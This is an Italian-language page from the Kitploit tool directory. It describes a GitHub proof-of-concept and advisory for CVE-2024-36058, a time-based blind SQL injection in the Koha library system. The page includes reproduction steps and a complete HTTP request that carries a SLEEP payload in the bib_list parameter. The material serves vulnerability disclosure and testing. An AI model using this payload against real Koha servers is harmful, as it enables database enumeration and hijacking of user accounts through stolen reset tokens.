Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-36058 — Proof-of-concept exploit e advisory per CVE-2024-36058, una SQL injection blind basata sul tempo in opac-sendbasket.pl del software bibliotecario Koha, che consente l'enumerazione autenticata del database. | Kitploit
Strumenti/GitHubGitHub/hacklantic/cve-2024-36058
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration Testing
GitHubhacklantic/cve-2024-36058

CVE-2024-36058

Proof-of-concept exploit e advisory per CVE-2024-36058, una SQL injection blind basata sul tempo in opac-sendbasket.pl del software bibliotecario Koha, che consente l'enumerazione autenticata del database.

Vedi Repository
10h 19m faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-36058 — Koha Library Software < 22.05.22 — SQL Injection cieca basata sul tempo

ID CVE: CVE-2024-36058
Prodotto: Koha Library Software
Tipo di vulnerabilità: SQL Injection cieca basata sul tempo (CWE-89)
Punteggio CVSS: 8.1 (Alto) Autenticato
Versioni interessate: Inferiori alla 22.05.22
Crediti: Karolis Narvilas


Descrizione

Koha è un sistema bibliotecario integrato open-source. Esiste una vulnerabilità di SQL injection cieca basata sul tempo nella funzionalità "Send Basket" in opac/opac-sendbasket.pl. Il parametro bib_list viene passato senza sanitizzazione in una query SQL, consentendo a un attaccante di iniettare payload SQL arbitrari che causano ritardi misurabili nella risposta del server.

Un utente bibliotecario normale (con privilegi bassi) può sfruttare questa vulnerabilità senza alcuna autorizzazione elevata. Sfruttando le discrepanze nei tempi di risposta, un attaccante può enumerare il database e recuperare contenuti che dovrebbero essere riservati all'accesso privilegiato.

Impatto: Un attaccante remoto autenticato può sfruttare CVE-2024-36058 per enumerare contenuti sensibili del database, inclusa l'exploitazione del flusso di reimpostazione della password e il recupero dei token di reimpostazione della password di altri account utente per dirottarli, portando ad accesso non autorizzato e potenziale esposizione dei dati.


Proof-of-Concept (PoC)

  1. Accedi a Koha come utente bibliotecario con privilegi bassi / normale.
  2. Aggiungi un libro al carrello, quindi clicca su "Send Basket".

Send Basket

  1. Intercetta la richiesta risultante utilizzando un proxy come Burp Suite e inietta il payload nel parametro bib_list come mostrato di seguito:

Richiesta:

root@kitploit:~
POST /cgi-bin/koha/opac-sendbasket.pl HTTP/1.1
Host: {domain}
Cookie: [Low Privilege Session]
-- SNIP --

email_add=<recipient>&comment=x&bib_list=1)+AND+(SELECT+1+FROM+(SELECT(SLEEP(36)))x)--+-&csrf_token=<csrf_token>

  1. Il payload iniettato fa sì che il database rimanga in attesa prima di restituire una risposta. In questo esempio, il server ha atteso per ~36 secondi, confermando che il punto di iniezione è sfruttabile.

SQLi Sleep PoC


Riferimenti

  • Koha Community - Note di rilascio per v22.05.22
  • MITRE - CVE-2024-36058
  • Hacklantic
Scarica lo strumento